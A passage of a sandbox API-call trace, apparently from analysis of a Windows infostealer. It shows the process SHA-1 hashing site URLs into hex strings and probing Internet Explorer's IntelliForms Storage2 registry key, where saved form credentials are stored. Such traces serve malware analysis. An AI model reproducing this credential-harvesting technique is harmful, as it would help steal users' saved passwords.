_Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FA") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93DD6133909C") returned 22 [0249.447] lstrlenW (lpString="FA") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217570 [0249.447] lstrcpyW (in: lpString1=0xd217570, lpString2="1A0A86F0ED93DD6133909C" | out: lpString1="1A0A86F0ED93DD6133909C") returned="1A0A86F0ED93DD6133909C" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909C", lpString2="FA" | out: lpString1="1A0A86F0ED93DD6133909CFA") returned="1A0A86F0ED93DD6133909CFA" [0249.447] LocalFree (hMem=0xd2180b0) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="91") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA") returned 24 [0249.448] lstrlenW (lpString="91") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd218470 [0249.448] lstrcpyW (in: lpString1=0xd218470, lpString2="1A0A86F0ED93DD6133909CFA" | out: lpString1="1A0A86F0ED93DD6133909CFA") returned="1A0A86F0ED93DD6133909CFA" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA", lpString2="91" | out: lpString1="1A0A86F0ED93DD6133909CFA91") returned="1A0A86F0ED93DD6133909CFA91" [0249.448] LocalFree (hMem=0xd217570) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="19") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA91") returned 26 [0249.448] lstrlenW (lpString="19") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215840 [0249.448] lstrcpyW (in: lpString1=0xd215840, lpString2="1A0A86F0ED93DD6133909CFA91" | out: lpString1="1A0A86F0ED93DD6133909CFA91") returned="1A0A86F0ED93DD6133909CFA91" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA91", lpString2="19" | out: lpString1="1A0A86F0ED93DD6133909CFA9119") returned="1A0A86F0ED93DD6133909CFA9119" [0249.448] LocalFree (hMem=0xd218470) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E5") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119") returned 28 [0249.448] lstrlenW (lpString="E5") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd2163a0 [0249.448] lstrcpyW (in: lpString1=0xd2163a0, lpString2="1A0A86F0ED93DD6133909CFA9119" | out: lpString1="1A0A86F0ED93DD6133909CFA9119") returned="1A0A86F0ED93DD6133909CFA9119" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119", lpString2="E5" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5") returned="1A0A86F0ED93DD6133909CFA9119E5" [0249.448] LocalFree (hMem=0xd215840) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="27") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E5") returned 30 [0249.448] lstrlenW (lpString="27") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd2151c0 [0249.448] lstrcpyW (in: lpString1=0xd2151c0, lpString2="1A0A86F0ED93DD6133909CFA9119E5" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5") returned="1A0A86F0ED93DD6133909CFA9119E5" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E5", lpString2="27" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E527") returned="1A0A86F0ED93DD6133909CFA9119E527" [0249.448] LocalFree (hMem=0xd2163a0) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6C") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E527") returned 32 [0249.448] lstrlenW (lpString="6C") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2148d0 [0249.448] lstrcpyW (in: lpString1=0xd2148d0, lpString2="1A0A86F0ED93DD6133909CFA9119E527" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E527") returned="1A0A86F0ED93DD6133909CFA9119E527" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E527", lpString2="6C" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C") returned="1A0A86F0ED93DD6133909CFA9119E5276C" [0249.448] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0E") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E5276C") returned 34 [0249.448] lstrlenW (lpString="0E") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67e60 [0249.448] lstrcpyW (in: lpString1=0x5d67e60, lpString2="1A0A86F0ED93DD6133909CFA9119E5276C" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C") returned="1A0A86F0ED93DD6133909CFA9119E5276C" [0249.448] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C", lpString2="0E" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E" [0249.448] LocalFree (hMem=0xd2148d0) returned 0x0 [0249.448] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="19") returned 2 [0249.448] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E5276C0E") returned 36 [0249.448] lstrlenW (lpString="19") returned 2 [0249.448] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66500 [0249.448] lstrcpyW (in: lpString1=0x5d66500, lpString2="1A0A86F0ED93DD6133909CFA9119E5276C0E" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E" [0249.449] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E", lpString2="19" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E19" [0249.449] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.449] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E6") returned 2 [0249.449] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E5276C0E19") returned 38 [0249.449] lstrlenW (lpString="E6") returned 2 [0249.449] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66340 [0249.449] lstrcpyW (in: lpString1=0x5d66340, lpString2="1A0A86F0ED93DD6133909CFA9119E5276C0E19" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E19" [0249.449] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19", lpString2="E6" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6" [0249.449] LocalFree (hMem=0x5d66500) returned 0x0 [0249.449] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E0") returned 2 [0249.449] lstrlenW (lpString="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6") returned 40 [0249.449] lstrlenW (lpString="E0") returned 2 [0249.449] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.449] lstrcpyW (in: lpString1=0x5d67840, lpString2="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6" [0249.449] lstrcatW (in: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6", lpString2="E0" | out: lpString1="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6E0") returned="1A0A86F0ED93DD6133909CFA9119E5276C0E19E6E0" [0249.449] LocalFree (hMem=0x5d66340) returned 0x0 [0249.449] CryptDestroyHash (hHash=0x5d9e550) returned 1 [0249.449] CryptReleaseContext (hProv=0x5d37810, dwFlags=0x0) returned 1 [0249.449] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.449] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.449] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.449] LocalFree (hMem=0x5d67840) returned 0x0 [0249.449] RegEnumValueW (in: hKey=0x94c, dwIndex=0x15, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url2", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.449] StrStrIW (lpFirst="leboncoin.fr", lpSrch="?") returned 0x0 [0249.449] StrStrIW (lpFirst="leboncoin.fr", lpSrch="http://") returned 0x0 [0249.449] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37910) returned 1 [0249.450] CryptCreateHash (in: hProv=0x5d37910, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.450] lstrlenW (lpString="leboncoin.fr") returned 12 [0249.450] CryptHashData (hHash=0x5d9e860, pbData=0x43ed4e0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0249.450] CryptGetHashParam (in: hHash=0x5d9e860, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.450] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.450] lstrlenW (lpString="") returned 0 [0249.450] lstrlenW (lpString="C4") returned 2 [0249.450] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.450] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.450] lstrcatW (in: lpString1="", lpString2="C4" | out: lpString1="C4") returned="C4" [0249.450] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9C") returned 2 [0249.450] lstrlenW (lpString="C4") returned 2 [0249.450] lstrlenW (lpString="9C") returned 2 [0249.450] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d34170 [0249.450] lstrcpyW (in: lpString1=0x5d34170, lpString2="C4" | out: lpString1="C4") returned="C4" [0249.450] lstrcatW (in: lpString1="C4", lpString2="9C" | out: lpString1="C49C") returned="C49C" [0249.450] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.450] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B1") returned 2 [0249.450] lstrlenW (lpString="C49C") returned 4 [0249.450] lstrlenW (lpString="B1") returned 2 [0249.450] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d324b0 [0249.450] lstrcpyW (in: lpString1=0x5d324b0, lpString2="C49C" | out: lpString1="C49C") returned="C49C" [0249.450] lstrcatW (in: lpString1="C49C", lpString2="B1" | out: lpString1="C49CB1") returned="C49CB1" [0249.450] LocalFree (hMem=0x5d34170) returned 0x0 [0249.450] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2C") returned 2 [0249.450] lstrlenW (lpString="C49CB1") returned 6 [0249.450] lstrlenW (lpString="2C") returned 2 [0249.450] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.450] lstrcpyW (in: lpString1=0x5d33db0, lpString2="C49CB1" | out: lpString1="C49CB1") returned="C49CB1" [0249.450] lstrcatW (in: lpString1="C49CB1", lpString2="2C" | out: lpString1="C49CB12C") returned="C49CB12C" [0249.450] LocalFree (hMem=0x5d324b0) returned 0x0 [0249.450] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="69") returned 2 [0249.450] lstrlenW (lpString="C49CB12C") returned 8 [0249.450] lstrlenW (lpString="69") returned 2 [0249.450] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.451] lstrcpyW (in: lpString1=0x5d34170, lpString2="C49CB12C" | out: lpString1="C49CB12C") returned="C49CB12C" [0249.451] lstrcatW (in: lpString1="C49CB12C", lpString2="69" | out: lpString1="C49CB12C69") returned="C49CB12C69" [0249.451] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="52") returned 2 [0249.451] lstrlenW (lpString="C49CB12C69") returned 10 [0249.451] lstrlenW (lpString="52") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d05a0 [0249.451] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="C49CB12C69" | out: lpString1="C49CB12C69") returned="C49CB12C69" [0249.451] lstrcatW (in: lpString1="C49CB12C69", lpString2="52" | out: lpString1="C49CB12C6952") returned="C49CB12C6952" [0249.451] LocalFree (hMem=0x5d34170) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="23") returned 2 [0249.451] lstrlenW (lpString="C49CB12C6952") returned 12 [0249.451] lstrlenW (lpString="23") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cff70 [0249.451] lstrcpyW (in: lpString1=0xd1cff70, lpString2="C49CB12C6952" | out: lpString1="C49CB12C6952") returned="C49CB12C6952" [0249.451] lstrcatW (in: lpString1="C49CB12C6952", lpString2="23" | out: lpString1="C49CB12C695223") returned="C49CB12C695223" [0249.451] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="38") returned 2 [0249.451] lstrlenW (lpString="C49CB12C695223") returned 14 [0249.451] lstrlenW (lpString="38") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cfcb0 [0249.451] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="C49CB12C695223" | out: lpString1="C49CB12C695223") returned="C49CB12C695223" [0249.451] lstrcatW (in: lpString1="C49CB12C695223", lpString2="38" | out: lpString1="C49CB12C69522338") returned="C49CB12C69522338" [0249.451] LocalFree (hMem=0xd1cff70) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="75") returned 2 [0249.451] lstrlenW (lpString="C49CB12C69522338") returned 16 [0249.451] lstrlenW (lpString="75") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0020 [0249.451] lstrcpyW (in: lpString1=0xd1d0020, lpString2="C49CB12C69522338" | out: lpString1="C49CB12C69522338") returned="C49CB12C69522338" [0249.451] lstrcatW (in: lpString1="C49CB12C69522338", lpString2="75" | out: lpString1="C49CB12C6952233875") returned="C49CB12C6952233875" [0249.451] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5A") returned 2 [0249.451] lstrlenW (lpString="C49CB12C6952233875") returned 18 [0249.451] lstrlenW (lpString="5A") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2167f0 [0249.451] lstrcpyW (in: lpString1=0xd2167f0, lpString2="C49CB12C6952233875" | out: lpString1="C49CB12C6952233875") returned="C49CB12C6952233875" [0249.451] lstrcatW (in: lpString1="C49CB12C6952233875", lpString2="5A" | out: lpString1="C49CB12C69522338755A") returned="C49CB12C69522338755A" [0249.451] LocalFree (hMem=0xd1d0020) returned 0x0 [0249.451] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="62") returned 2 [0249.451] lstrlenW (lpString="C49CB12C69522338755A") returned 20 [0249.451] lstrlenW (lpString="62") returned 2 [0249.451] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd216df0 [0249.451] lstrcpyW (in: lpString1=0xd216df0, lpString2="C49CB12C69522338755A" | out: lpString1="C49CB12C69522338755A") returned="C49CB12C69522338755A" [0249.451] lstrcatW (in: lpString1="C49CB12C69522338755A", lpString2="62" | out: lpString1="C49CB12C69522338755A62") returned="C49CB12C69522338755A62" [0249.451] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.452] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FA") returned 2 [0249.452] lstrlenW (lpString="C49CB12C69522338755A62") returned 22 [0249.452] lstrlenW (lpString="FA") returned 2 [0249.452] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd2177b0 [0249.452] lstrcpyW (in: lpString1=0xd2177b0, lpString2="C49CB12C69522338755A62" | out: lpString1="C49CB12C69522338755A62") returned="C49CB12C69522338755A62" [0249.452] lstrcatW (in: lpString1="C49CB12C69522338755A62", lpString2="FA" | out: lpString1="C49CB12C69522338755A62FA") returned="C49CB12C69522338755A62FA" [0249.452] LocalFree (hMem=0xd216df0) returned 0x0 [0249.452] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.452] lstrlenW (lpString="C49CB12C69522338755A62FA") returned 24 [0249.452] lstrlenW (lpString="B6") returned 2 [0249.452] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217030 [0249.452] lstrcpyW (in: lpString1=0xd217030, lpString2="C49CB12C69522338755A62FA" | out: lpString1="C49CB12C69522338755A62FA") returned="C49CB12C69522338755A62FA" [0249.452] lstrcatW (in: lpString1="C49CB12C69522338755A62FA", lpString2="B6" | out: lpString1="C49CB12C69522338755A62FAB6") returned="C49CB12C69522338755A62FAB6" [0249.452] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.452] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F1") returned 2 [0249.452] lstrlenW (lpString="C49CB12C69522338755A62FAB6") returned 26 [0249.452] lstrlenW (lpString="F1") returned 2 [0249.452] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215df0 [0249.452] lstrcpyW (in: lpString1=0xd215df0, lpString2="C49CB12C69522338755A62FAB6" | out: lpString1="C49CB12C69522338755A62FAB6") returned="C49CB12C69522338755A62FAB6" [0249.452] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6", lpString2="F1" | out: lpString1="C49CB12C69522338755A62FAB6F1") returned="C49CB12C69522338755A62FAB6F1" [0249.452] LocalFree (hMem=0xd217030) returned 0x0 [0249.452] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B5") returned 2 [0249.452] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1") returned 28 [0249.452] lstrlenW (lpString="B5") returned 2 [0249.452] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215020 [0249.452] lstrcpyW (in: lpString1=0xd215020, lpString2="C49CB12C69522338755A62FAB6F1" | out: lpString1="C49CB12C69522338755A62FAB6F1") returned="C49CB12C69522338755A62FAB6F1" [0249.452] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1", lpString2="B5" | out: lpString1="C49CB12C69522338755A62FAB6F1B5") returned="C49CB12C69522338755A62FAB6F1B5" [0249.452] LocalFree (hMem=0xd215df0) returned 0x0 [0249.452] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="61") returned 2 [0249.452] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B5") returned 30 [0249.452] lstrlenW (lpString="61") returned 2 [0249.452] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215360 [0249.452] lstrcpyW (in: lpString1=0xd215360, lpString2="C49CB12C69522338755A62FAB6F1B5" | out: lpString1="C49CB12C69522338755A62FAB6F1B5") returned="C49CB12C69522338755A62FAB6F1B5" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B5", lpString2="61" | out: lpString1="C49CB12C69522338755A62FAB6F1B561") returned="C49CB12C69522338755A62FAB6F1B561" [0249.453] LocalFree (hMem=0xd215020) returned 0x0 [0249.453] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1E") returned 2 [0249.453] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B561") returned 32 [0249.453] lstrlenW (lpString="1E") returned 2 [0249.453] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215290 [0249.453] lstrcpyW (in: lpString1=0xd215290, lpString2="C49CB12C69522338755A62FAB6F1B561" | out: lpString1="C49CB12C69522338755A62FAB6F1B561") returned="C49CB12C69522338755A62FAB6F1B561" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B561", lpString2="1E" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E") returned="C49CB12C69522338755A62FAB6F1B5611E" [0249.453] LocalFree (hMem=0xd215360) returned 0x0 [0249.453] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6E") returned 2 [0249.453] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B5611E") returned 34 [0249.453] lstrlenW (lpString="6E") returned 2 [0249.453] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67840 [0249.453] lstrcpyW (in: lpString1=0x5d67840, lpString2="C49CB12C69522338755A62FAB6F1B5611E" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E") returned="C49CB12C69522338755A62FAB6F1B5611E" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B5611E", lpString2="6E" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E") returned="C49CB12C69522338755A62FAB6F1B5611E6E" [0249.453] LocalFree (hMem=0xd215290) returned 0x0 [0249.453] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="37") returned 2 [0249.453] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B5611E6E") returned 36 [0249.453] lstrlenW (lpString="37") returned 2 [0249.453] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66ce0 [0249.453] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="C49CB12C69522338755A62FAB6F1B5611E6E" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E") returned="C49CB12C69522338755A62FAB6F1B5611E6E" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E", lpString2="37" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E37") returned="C49CB12C69522338755A62FAB6F1B5611E6E37" [0249.453] LocalFree (hMem=0x5d67840) returned 0x0 [0249.453] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="73") returned 2 [0249.453] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B5611E6E37") returned 38 [0249.453] lstrlenW (lpString="73") returned 2 [0249.453] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67e60 [0249.453] lstrcpyW (in: lpString1=0x5d67e60, lpString2="C49CB12C69522338755A62FAB6F1B5611E6E37" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E37") returned="C49CB12C69522338755A62FAB6F1B5611E6E37" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E37", lpString2="73" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E3773") returned="C49CB12C69522338755A62FAB6F1B5611E6E3773" [0249.453] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.453] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="71") returned 2 [0249.453] lstrlenW (lpString="C49CB12C69522338755A62FAB6F1B5611E6E3773") returned 40 [0249.453] lstrlenW (lpString="71") returned 2 [0249.453] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d66ce0 [0249.453] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="C49CB12C69522338755A62FAB6F1B5611E6E3773" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E3773") returned="C49CB12C69522338755A62FAB6F1B5611E6E3773" [0249.453] lstrcatW (in: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E3773", lpString2="71" | out: lpString1="C49CB12C69522338755A62FAB6F1B5611E6E377371") returned="C49CB12C69522338755A62FAB6F1B5611E6E377371" [0249.453] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.453] CryptDestroyHash (hHash=0x5d9e860) returned 1 [0249.453] CryptReleaseContext (hProv=0x5d37910, dwFlags=0x0) returned 1 [0249.454] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.454] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.454] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.454] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.454] RegEnumValueW (in: hKey=0x94c, dwIndex=0x16, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url1", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.454] StrStrIW (lpFirst="flickr.com", lpSrch="?") returned 0x0 [0249.454] StrStrIW (lpFirst="flickr.com", lpSrch="http://") returned 0x0 [0249.454] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d3a110) returned 1 [0249.454] CryptCreateHash (in: hProv=0x5d3a110, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.454] lstrlenW (lpString="flickr.com") returned 10 [0249.454] CryptHashData (hHash=0x5d9d6e0, pbData=0x43ed4e0, dwDataLen=0x16, dwFlags=0x0) returned 1 [0249.454] CryptGetHashParam (in: hHash=0x5d9d6e0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.454] _vsnwprintf 